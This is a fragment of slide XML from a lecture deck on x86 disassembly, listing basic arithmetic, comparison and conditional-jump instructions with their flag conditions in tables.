                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>inc edx</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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485425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>dec ecx</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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485425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>mul 0x50</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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485425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>div 0x75</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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450875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>xor eax, eax</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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485425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>shl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t> eax, 2</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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485425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>ror</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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485425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>nop</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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81"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="827" name="Google Shape;827;p81"/>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Conditionals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: instructions that perform the comparison, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Uses with flags ZF, CF, …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="828" name="Google Shape;828;p81"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1259632" y="3645024"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{D86BE483-798B-4F8A-A1FD-F16CD49BAE18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2032000"/>
                <a:gridCol w="2032000"/>
                <a:gridCol w="2032000"/>
              </a:tblGrid>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>cmp</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>ZF</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>CF</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>Dst = src</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="1800"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>Dst &lt; src</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="1800"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>Dst &gt; src</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="1800"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="18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sp>
        <p:nvSpPr>
          <p:cNvPr id="829" name="Google Shape;829;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496573" y="2708920"/>
            <a:ext cx="1398140" cy="830997"/>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2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>cmp dst, src</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Teko"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>test dst, src</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Teko"/>
              <a:ea typeface="Teko"/>
              <a:cs typeface="Teko"/>
              <a:sym typeface="Tek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82"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="835" name="Google Shape;835;p82"/>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Branching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: a sequence of code that is conditionally executed depending on the flow of the program, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>jmp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>and many versions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="836" name="Google Shape;836;p82"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="323528" y="2636912"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{D86BE483-798B-4F8A-A1FD-F16CD49BAE18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1535125"/>
                <a:gridCol w="2425325"/>
              </a:tblGrid>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>jz loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>ZF=1</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>jnz loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>ZF=0</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>jne loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>!=</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>jg loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>jge loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>&gt;=</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>ja</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t> loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Jg,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t> unsinged</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="313300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>jae loc</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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rPr lang="en-GB" sz="2000">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Jge, unsigned</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
